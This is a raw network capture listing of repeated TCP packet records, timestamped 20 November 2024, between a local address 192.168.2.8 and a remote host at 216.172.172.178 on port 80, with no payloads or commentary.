                                                                                        Nov 20, 2024 07:53:13.417213917 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417256117 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417283058 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417293072 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417303085 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417311907 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417320967 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417324066 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417349100 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417368889 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417423010 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417433023 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417443991 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417459965 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417486906 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417490959 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417496920 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417505980 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417515993 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417522907 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417536020 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417608023 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417617083 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417627096 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417638063 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417646885 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417650938 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417658091 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417668104 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417675018 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417679071 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417690039 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417699099 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417715073 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417730093 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417763948 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417774916 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417784929 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417793036 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417804003 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417829990 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417856932 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417866945 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417876005 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417886019 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417897940 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417901993 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417907000 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417917967 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417934895 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417963982 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418029070 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418071985 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418133020 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418143034 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418195009 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418226957 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418236971 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418246031 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418256044 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418266058 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418276072 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418277979 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418284893 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418297052 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418313980 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418334961 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418337107 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418346882 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418356895 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418365955 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418371916 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418376923 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418390989 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418399096 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418401003 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418438911 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418545008 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418557882 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418569088 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418574095 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418579102 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418584108 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418610096 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418620110 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418756008 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418765068 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418767929 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418776035 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418787956 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418796062 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418802977 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418808937 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418813944 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418828964 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418831110 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418842077 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418843031 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418852091 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418859005 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418879032 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418888092 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418893099 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418896914 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418899059 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418925047 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418940067 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418950081 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418960094 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418992043 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.419001102 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.419002056 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.419034958 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.463283062 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.463325024 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.463331938 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.463421106 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.463429928 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.463442087 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.463453054 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.463454008 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.463505030 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.918649912 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918664932 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918674946 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918685913 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918699026 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918765068 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.918793917 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918811083 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918817043 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.918832064 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918833017 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.918844938 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918857098 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918869019 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918870926 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.918879986 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918895006 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918900967 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.918908119 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918917894 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918932915 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.918936014 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918947935 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918953896 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.918958902 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918981075 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.918984890 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.918991089 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919002056 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919013977 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919020891 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919028044 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919034004 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919044971 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919054985 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919064045 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919074059 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919090986 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919104099 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919110060 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919115067 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919126987 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919137001 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919140100 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919156075 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919167995 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919177055 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919188976 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919199944 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919199944 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919212103 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919222116 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919223070 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919233084 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919244051 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919251919 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919255972 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919266939 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919276953 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919287920 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919291973 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919298887 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919322014 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919331074 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919334888 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919342995 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919346094 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919358015 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919361115 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919368029 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919378996 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919389963 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919399977 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919410944 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919420958 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919431925 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919445038 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919452906 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919462919 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919473886 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919485092 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919490099 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919497967 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919509888 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919518948 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919526100 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919531107 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919544935 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919552088 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919553995 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919564962 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919569969 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919575930 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919594049 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919595003 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919610023 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919610977 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919621944 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919635057 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919645071 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919651031 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919658899 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919667006 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919670105 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919686079 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919696093 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919698000 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919708967 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919719934 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919725895 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919734001 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919739962 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919750929 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919760942 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919770956 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919770956 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919781923 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919790983 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919790983 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919804096 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919815063 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919817924 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919825077 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919833899 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919836998 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919852018 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919853926 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919868946 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919878960 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919886112 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919888973 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919899940 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919907093 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919909954 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919922113 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919933081 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919943094 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919946909 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919954062 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919965029 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919971943 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.919975042 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919991016 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.919995070 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920002937 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920012951 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920020103 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920023918 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920034885 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920039892 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920046091 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920056105 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920089006 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920099020 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920099020 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920130014 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920243979 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920254946 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920265913 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920275927 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920285940 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920289993 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920296907 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920309067 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920320034 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920327902 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920351982 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920394897 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920406103 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920417070 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920427084 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920437098 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920443058 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920449018 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920459986 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920471907 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920481920 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920483112 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920494080 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920504093 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920506954 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920516968 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920532942 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920556068 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920566082 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920571089 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920578003 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920583010 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920588017 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920593023 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920598984 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920604944 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920605898 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920610905 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920614004 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920615911 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920622110 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920631886 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920644045 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920649052 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920654058 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920660973 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.920700073 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.920712948 CET4970780192.168.2.8216.172.172.178
